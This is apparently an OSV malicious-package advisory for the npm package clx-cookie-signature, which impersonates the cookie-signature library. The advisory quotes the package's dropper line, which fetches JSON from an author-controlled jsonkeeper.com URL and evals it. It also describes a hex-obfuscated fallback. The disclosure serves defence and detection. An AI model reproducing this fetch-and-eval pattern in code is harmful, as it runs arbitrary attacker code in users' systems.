MAL-2026-6141

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/clx-cookie-signature/MAL-2026-6141.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6141

Published

2026-06-18T22:28:34Z

Modified

2026-06-18T23:16:47.847150441Z

Summary

Malicious code in clx-cookie-signature (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3)

Package impersonates the popular cookie-signature library (copying its README, author field 'TJ Holowaychuk tj@learnboost.com', and sign/unsign API), but index.js adds a top-level dropper that fires the moment the module is required. Specifically, index.js line 16 issues require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); }), eval'ing whatever JSON the author currently hosts at that URL. A helper g() (index.js lines 18-24) decodes hex-encoded strings to reconstruct the tokens 'axios', 'get', 'then' and a second payload URL https://www.jsonkeeper.com/b/HY6M6, providing an obfuscated fallback dropper. Because jsonkeeper.com is a mutable, author-controlled paste host, the author can change the executed code at any time without republishing the package. Any project that installs and require()s clx-cookie-signature — likely as a mistyped substitute for cookie-signature — runs arbitrary attacker code in the consuming process.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3",
            "source": "amazon-inspector",
            "modified_time": "2026-06-18T22:28:34Z",
            "id": "IN-MAL-2026-007036",
            "versions": [
                "1.2.1"
            ],
            "import_time": "2026-06-18T23:09:38.765876167Z"
        }
    ]
}

References

https://www.npmjs.com/package/clx-cookie-signature/v/1.2.1

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / clx-cookie-signature

Package

Name: clx-cookie-signature; View open source insights on deps.dev
Purl: pkg:npm/clx-cookie-signature

Affected ranges

Affected versions

1.*

1.2.1

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/clx-cookie-signature/MAL-2026-6141.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "9eb97dcae23527bc66606235e0ad5d2c89692d311120dec3a636acf479e53047",
            "tlsh": "663155137ea5d01712b121b3b1f3cc47fd6695601b9a46e0bb6454943ded6b28f30ed8",
            "path": "index.js"
        },
        {
            "sha256": "e82be7eb22a7cdb806c21d601fdbcf7199f908945bb118c22d86c7d031b6c12d",
            "tlsh": "02f04c1795685d7706fc5395f8640247b6125f1f00b48c0f36ba522c576745707a8f7a",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-spfhApPggc7s8hRJAXMlnJGLYJQ3iqqCUpvmTu/dkos6z3hRvV1x3DUQaFq3TAPkq1kpmDQF5BOga2ILgEG7vg==",
                "sha1": "16a98bcda5b9b2178845a07df756ec788cdfed6e"
            },
            "filename": "clx-cookie-signature-1.2.1.tgz"
        }
    ]
}